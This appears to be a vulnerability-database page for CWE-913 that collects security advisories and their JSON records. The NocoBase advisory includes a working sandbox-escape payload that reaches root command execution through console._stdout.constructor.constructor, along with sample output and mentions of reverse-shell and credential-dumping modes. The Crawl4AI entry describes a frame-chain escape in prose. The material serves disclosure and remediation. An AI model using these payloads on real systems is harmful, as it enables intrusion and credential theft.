CWE-913
Allowed-with-ReviewImproper Control of Dynamically-Managed Code Resources
Abstraction: Class · Status: Incomplete
The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.
159 vulnerabilities reference this CWE, most recent first.
GHSA-PX3P-VGH9-M57C
Vulnerability from github – Published: 2026-03-30 17:16 – Updated: 2026-03-31 18:50## Summary
NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.
An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.
Exploit Chain
console._stdout.constructor.constructor→ host-realmFunctionconstructorFunction('return process')()→ Node.jsprocessobjectprocess.mainModule.require('child_process')→ unrestricted module loadingchild_process.execSync('id')→ RCE as root
This completely bypasses the customRequire allowlist.
Impact
- Remote Code Execution as root (uid=0) inside Docker container
- Database credential theft (
DB_PASSWORD,INIT_ROOT_PASSWORDfromprocess.env) - Arbitrary file read/write via
require('fs') - Reverse shell confirmed
- Outbound network access for lateral movement
Proof of Concept
HTTP Request:
POST /api/flow_nodes:test Authorization: Bearer Content-Type: application/json
{ "type": "script", "config": { "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }
Response:
{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}
Environment
- Docker image:
nocobase/nocobase:latest - NocoBase CLI: v2.0.26
- Node.js: v20.20.1
- OS: Debian GNU/Linux 12 (bookworm)
PoC
Got reverse shell
Proof of concept the root privileges
os-release demonstration
App path
Exploit Usage:
Reverse Shell Mode
Dump system information & creds
Remote Command Execution Mode
Remediation
- Replace Node.js
vmmodule withisolated-vmfor true V8 isolate separation - Do not pass the host
consoleobject into the sandbox; create a clean proxy - Run the application as a non-root user inside Docker
- Restrict
/api/flow_nodes:testto admin-only roles
Alternative Escape Vectors
console._stderr.constructor.constructor(identical chain via stderr)Error.prepareStackTrace+CallSite.getThis()(V8 CallSite API)
Reporter
Onurcan Genç — Independent Security Researcher, Bilkent University
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.27"
},
"package": {
"ecosystem": "npm",
"name": "@nocobase/plugin-workflow-javascript"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.28"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34156"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T17:16:24Z",
"nvd_published_at": "2026-03-31T14:16:12Z",
"severity": "CRITICAL"
},
"details": "`##` Summary\n\nNocoBase\u0027s Workflow Script Node executes user-supplied JavaScript inside a Node.js `vm` sandbox with a custom `require` allowlist (controlled by `WORKFLOW_SCRIPT_MODULES` env var). However, the `console` object passed into the sandbox context exposes host-realm `WritableWorkerStdio` stream objects via `console._stdout` and `console._stderr`.\n\nAn authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.\n\n## Exploit Chain\n\n1. `console._stdout.constructor.constructor` \u2192 host-realm `Function` constructor\n2. `Function(\u0027return process\u0027)()` \u2192 Node.js `process` object\n3. `process.mainModule.require(\u0027child_process\u0027)` \u2192 unrestricted module loading\n4. `child_process.execSync(\u0027id\u0027)` \u2192 RCE as root\n\nThis completely bypasses the `customRequire` allowlist.\n\n## Impact\n\n- Remote Code Execution as root (uid=0) inside Docker container\n- Database credential theft (`DB_PASSWORD`, `INIT_ROOT_PASSWORD` from `process.env`)\n- Arbitrary file read/write via `require(\u0027fs\u0027)`\n- Reverse shell confirmed\n- Outbound network access for lateral movement\n\n## Proof of Concept\n\n**HTTP Request:**\n\nPOST /api/flow_nodes:test\nAuthorization: Bearer \u003cJWT_TOKEN\u003e\nContent-Type: application/json\n\n{\n \"type\": \"script\",\n \"config\": {\n \"content\": \"const Fn=console._stdout.constructor.constructor;const proc=Fn(\u0027return process\u0027)();const cp=proc.mainModule.require(\u0027child_process\u0027);return cp.execSync(\u0027id\u0027).toString().trim();\",\n \"timeout\": 5000,\n \"arguments\": []\n }\n}\n\n**Response:**\n\n{\"data\":{\"status\":1,\"result\":\"uid=0(root) gid=0(root) groups=0(root)\",\"log\":\"\"}}\n\n## Environment\n\n- Docker image: `nocobase/nocobase:latest`\n- NocoBase CLI: v2.0.26\n- Node.js: v20.20.1\n- OS: Debian GNU/Linux 12 (bookworm)\n\n## PoC\n\nGot reverse shell\n\n\u003cimg width=\"1300\" height=\"743\" alt=\"Screenshot 2026-03-26 at 06 09 51\" src=\"https://github.com/user-attachments/assets/fcb65346-2d98-485a-a849-153d5957c78e\" /\u003e\n\nProof of concept the root privileges\n\n\u003cimg width=\"1292\" height=\"515\" alt=\"Screenshot 2026-03-26 at 06 12 29\" src=\"https://github.com/user-attachments/assets/599cd915-d5e9-47b6-9ddb-655ae4f22d50\" /\u003e\n\nos-release demonstration\n\n\u003cimg width=\"1290\" height=\"523\" alt=\"Screenshot 2026-03-26 at 06 12 54\" src=\"https://github.com/user-attachments/assets/48030450-f2b1-4edc-a7f0-caafbf55dd00\" /\u003e\n\n\u003cimg width=\"1296\" height=\"516\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f7012c09-885b-48fb-a6d4-7282c0326d0b\" /\u003e\n\nApp path\n\n\u003cimg width=\"1295\" height=\"516\" alt=\"Screenshot 2026-03-26 at 06 14 04\" src=\"https://github.com/user-attachments/assets/b4846af8-cb10-4c2a-886f-b19a120c2245\" /\u003e\n\n## Exploit Usage:\n\nReverse Shell Mode\n\n\u003cimg width=\"1299\" height=\"523\" alt=\"tool1\" src=\"https://github.com/user-attachments/assets/6c26d6f3-0ad2-4a61-9692-b150409ee569\" /\u003e\n\nDump system information \u0026 creds\n\n\u003cimg width=\"635\" height=\"591\" alt=\"tool2\" src=\"https://github.com/user-attachments/assets/08dbc231-d686-4536-8a74-272ceb5c10a8\" /\u003e\n\nRemote Command Execution Mode\n\n\u003cimg width=\"644\" height=\"467\" alt=\"tool3\" src=\"https://github.com/user-attachments/assets/fc95d89b-eff5-4eec-87b4-f6022778feec\" /\u003e\n\n\n\n## Remediation\n\n1. Replace Node.js `vm` module with `isolated-vm` for true V8 isolate separation\n2. Do not pass the host `console` object into the sandbox; create a clean proxy\n3. Run the application as a non-root user inside Docker\n4. Restrict `/api/flow_nodes:test` to admin-only roles\n\n## Alternative Escape Vectors\n\n- `console._stderr.constructor.constructor` (identical chain via stderr)\n- `Error.prepareStackTrace` + `CallSite.getThis()` (V8 CallSite API)\n\n## Reporter\n\nOnurcan Gen\u00e7 \u2014 Independent Security Researcher, Bilkent University",
"id": "GHSA-px3p-vgh9-m57c",
"modified": "2026-03-31T18:50:32Z",
"published": "2026-03-30T17:16:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34156"
},
{
"type": "WEB",
"url": "https://github.com/nocobase/nocobase/pull/8967"
},
{
"type": "PACKAGE",
"url": "https://github.com/nocobase/nocobase"
},
{
"type": "WEB",
"url": "https://github.com/nocobase/nocobase/releases/tag/v2.0.28"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node"
}
GHSA-Q358-8XV4-RG52
Vulnerability from github – Published: 2022-05-24 17:29 – Updated: 2022-05-24 17:29A vulnerability in the command-line interface in Brocade Fabric OS before Brocade Fabric OS v8.2.2a1, 8.2.2c, v7.4.2g, v8.2.0_CBN3, v8.2.1e, v8.1.2k, v9.0.0, could allow a local authenticated attacker to modify shell variables, which may lead to an escalation of privileges or bypassing the logging.
{
"affected": [],
"aliases": [
"CVE-2020-15372"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-25T14:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the command-line interface in Brocade Fabric OS before Brocade Fabric OS v8.2.2a1, 8.2.2c, v7.4.2g, v8.2.0_CBN3, v8.2.1e, v8.1.2k, v9.0.0, could allow a local authenticated attacker to modify shell variables, which may lead to an escalation of privileges or bypassing the logging.",
"id": "GHSA-q358-8xv4-rg52",
"modified": "2022-05-24T17:29:33Z",
"published": "2022-05-24T17:29:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15372"
},
{
"type": "WEB",
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2020-1081"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-Q6H9-JC46-5C2P
Vulnerability from github – Published: 2025-12-15 03:30 – Updated: 2025-12-15 03:30A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Executing manipulation of the argument action can lead to dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.
{
"affected": [],
"aliases": [
"CVE-2025-14695"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-15T01:15:38Z",
"severity": "MODERATE"
},
"details": "A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Executing manipulation of the argument action can lead to dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.",
"id": "GHSA-q6h9-jc46-5c2p",
"modified": "2025-12-15T03:30:18Z",
"published": "2025-12-15T03:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14695"
},
{
"type": "WEB",
"url": "https://github.com/rassec2/dbcve/issues/20"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.336413"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.336413"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.705587"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-Q72C-36C3-WHH7
Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09There is an Improper Control of Dynamically Managing Code Resources Vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to remotely execute commands.
{
"affected": [],
"aliases": [
"CVE-2021-22387"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-08-02T17:15:00Z",
"severity": "CRITICAL"
},
"details": "There is an Improper Control of Dynamically Managing Code Resources Vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to remotely execute commands.",
"id": "GHSA-q72c-36c3-whh7",
"modified": "2022-05-24T19:09:34Z",
"published": "2022-05-24T19:09:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22387"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2021/6"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-Q76Q-X9C4-447V
Vulnerability from github – Published: 2022-06-15 00:00 – Updated: 2022-06-24 00:00The Multipass service was found to have code paths that could be abused to cause a denial of service for authentication or authorization operations. A malicious attacker could perform an application-level denial of service attack, potentially causing authentication and/or authorization operations to fail for the duration of the attack. This could lead to performance degradation or login failures for customer Palantir Foundry environments. This vulnerability is resolved in Multipass 3.647.0. This issue affects: Palantir Foundry Multipass versions prior to 3.647.0.
{
"affected": [],
"aliases": [
"CVE-2022-27889"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-14T14:15:00Z",
"severity": "CRITICAL"
},
"details": "The Multipass service was found to have code paths that could be abused to cause a denial of service for authentication or authorization operations. A malicious attacker could perform an application-level denial of service attack, potentially causing authentication and/or authorization operations to fail for the duration of the attack. This could lead to performance degradation or login failures for customer Palantir Foundry environments. This vulnerability is resolved in Multipass 3.647.0. This issue affects: Palantir Foundry Multipass versions prior to 3.647.0.",
"id": "GHSA-q76q-x9c4-447v",
"modified": "2022-06-24T00:00:33Z",
"published": "2022-06-15T00:00:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27889"
},
{
"type": "WEB",
"url": "https://github.com/palantir/security-bulletins/blob/main/PLTRSEC-2022-02.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QG33-X2C5-6P44
Vulnerability from github – Published: 2024-06-10 21:30 – Updated: 2025-01-21 18:18Langflow allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "langflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-37014"
],
"database_specific": {
"cwe_ids": [
"CWE-913",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-11T19:29:16Z",
"nvd_published_at": "2024-06-10T20:15:15Z",
"severity": "HIGH"
},
"details": "Langflow allows remote code execution if untrusted users are able to reach the \"POST /api/v1/custom_component\" endpoint and provide a Python script.",
"id": "GHSA-qg33-x2c5-6p44",
"modified": "2025-01-21T18:18:10Z",
"published": "2024-06-10T21:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014"
},
{
"type": "WEB",
"url": "https://github.com/langflow-ai/langflow/issues/1973"
},
{
"type": "PACKAGE",
"url": "https://github.com/langflow-ai/langflow"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Langflow remote code execution vulnerability"
}
GHSA-QQF6-7934-8VV8
Vulnerability from github – Published: 2021-12-21 00:00 – Updated: 2022-01-05 00:02Improper Access Control of Dynamically-Managed Code Resources (DLL) in Thales Sentinel Protection Installer could allow the execution of arbitrary code.
{
"affected": [],
"aliases": [
"CVE-2021-42809"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-20T21:15:00Z",
"severity": "HIGH"
},
"details": "Improper Access Control of Dynamically-Managed Code Resources (DLL) in Thales Sentinel Protection Installer could allow the execution of arbitrary code.",
"id": "GHSA-qqf6-7934-8vv8",
"modified": "2022-01-05T00:02:08Z",
"published": "2021-12-21T00:00:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42809"
},
{
"type": "WEB",
"url": "https://cpl.thalesgroup.com/fr/software-monetization/security-updates"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-QXJP-W3PJ-48M7
Vulnerability from github – Published: 2026-06-16 20:13 – Updated: 2026-06-16 20:13Summary
The _safe_eval_expression() function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore. Python generator and frame object attributes (gi_frame, f_back, f_builtins) do NOT start with underscore, enabling a complete sandbox escape to achieve arbitrary code execution.
The attack requires no authentication (JWT disabled by default) and is triggered via POST /crawl with a crafted extraction schema.
Attack Vector
An attacker sends a POST /crawl request with a JsonCssExtractionStrategy schema containing a malicious computed field expression that:
1. Creates a generator to access gi_frame
2. Walks the frame chain via f_back
3. Reaches f_builtins containing the real __import__
4. Imports os and executes arbitrary commands
Impact
Unauthenticated remote code execution inside the Docker container. An attacker can execute arbitrary system commands, read/write files, and exfiltrate secrets.
Fix Details
- Removed
eval()from computed field expression path entirely -- expressions now log a warning and return default value - Deleted
_safe_eval_expression()function and_SAFE_EVAL_BUILTINS(dead security-sensitive code) functionkey with Python callables still works for SDK users- Replaced
eval()in/config/dumpwith JSON-based input validated by Pydantic - Fixed hook_manager sandbox: stripped
__builtins__,__loader__,__spec__from injected modules; removedgetattr,setattr,type,__build_class__from allowed builtins
Workarounds
- Upgrade to the patched version (recommended)
- Enable JWT authentication via
CRAWL4AI_API_TOKENenvironment variable - Restrict network access to the Docker API
Credits
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.8.6"
},
"package": {
"ecosystem": "PyPI",
"name": "crawl4ai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53753"
],
"database_specific": {
"cwe_ids": [
"CWE-913",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T20:13:07Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nThe `_safe_eval_expression()` function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore. Python generator and frame object attributes (`gi_frame`, `f_back`, `f_builtins`) do NOT start with underscore, enabling a complete sandbox escape to achieve arbitrary code execution.\n\nThe attack requires no authentication (JWT disabled by default) and is triggered via `POST /crawl` with a crafted extraction schema.\n\n### Attack Vector\n\nAn attacker sends a `POST /crawl` request with a `JsonCssExtractionStrategy` schema containing a malicious computed field expression that:\n1. Creates a generator to access `gi_frame`\n2. Walks the frame chain via `f_back`\n3. Reaches `f_builtins` containing the real `__import__`\n4. Imports `os` and executes arbitrary commands\n\n### Impact\n\nUnauthenticated remote code execution inside the Docker container. An attacker can execute arbitrary system commands, read/write files, and exfiltrate secrets.\n\n### Fix Details\n\n1. Removed `eval()` from computed field expression path entirely -- expressions now log a warning and return default value\n2. Deleted `_safe_eval_expression()` function and `_SAFE_EVAL_BUILTINS` (dead security-sensitive code)\n3. `function` key with Python callables still works for SDK users\n4. Replaced `eval()` in `/config/dump` with JSON-based input validated by Pydantic\n5. Fixed hook_manager sandbox: stripped `__builtins__`, `__loader__`, `__spec__` from injected modules; removed `getattr`, `setattr`, `type`, `__build_class__` from allowed builtins\n\n### Workarounds\n\n1. Upgrade to the patched version (recommended)\n2. Enable JWT authentication via `CRAWL4AI_API_TOKEN` environment variable\n3. Restrict network access to the Docker API\n\n### Credits\n\n- Song Binglin ([q1uf3ng](https://github.com/q1uf3ng)) - reported the AST sandbox escape\n- by111 ([August829](https://github.com/August829)) - reported the hook sandbox `__builtins__` escape and hardcoded JWT secret bypass\n- [jannahopp](https://github.com/jannahopp) - PR #1855 proposing eval removal\n- [ntohidi](https://github.com/ntohidi) - PR #1886 proposing allowlist approach",
"id": "GHSA-qxjp-w3pj-48m7",
"modified": "2026-06-16T20:13:07Z",
"published": "2026-06-16T20:13:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7"
},
{
"type": "WEB",
"url": "https://github.com/unclecode/crawl4ai/pull/1855"
},
{
"type": "WEB",
"url": "https://github.com/unclecode/crawl4ai/pull/1886"
},
{
"type": "PACKAGE",
"url": "https://github.com/unclecode/crawl4ai"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API"
}
GHSA-R3GR-CXRF-HG25
Vulnerability from github – Published: 2021-12-09 19:15 – Updated: 2024-06-25 13:47FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.9.10.7"
},
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.9.10.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-35491"
],
"database_specific": {
"cwe_ids": [
"CWE-502",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2021-04-08T21:05:38Z",
"nvd_published_at": "2020-12-17T19:15:00Z",
"severity": "HIGH"
},
"details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.",
"id": "GHSA-r3gr-cxrf-hg25",
"modified": "2024-06-25T13:47:22Z",
"published": "2021-12-09T19:15:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35491"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/issues/2986"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d"
},
{
"type": "WEB",
"url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"type": "PACKAGE",
"url": "https://github.com/FasterXML/jackson-databind"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210122-0005"
},
{
"type": "WEB",
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Serialization gadgets exploit in jackson-databind"
}
GHSA-R4P4-FGJP-QXM7
Vulnerability from github – Published: 2024-03-15 18:30 – Updated: 2024-03-15 18:30Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.
{
"affected": [],
"aliases": [
"CVE-2024-2537"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-15T18:15:08Z",
"severity": "MODERATE"
},
"details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.",
"id": "GHSA-r4p4-fgjp-qxm7",
"modified": "2024-03-15T18:30:38Z",
"published": "2024-03-15T18:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2537"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/2376663"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Input Validation
For any externally-influenced input, check the input against an allowlist of acceptable values.
Mitigation
Strategy: Refactoring
Refactor the code so that it does not need to be dynamically managed.
No CAPEC attack patterns related to this CWE.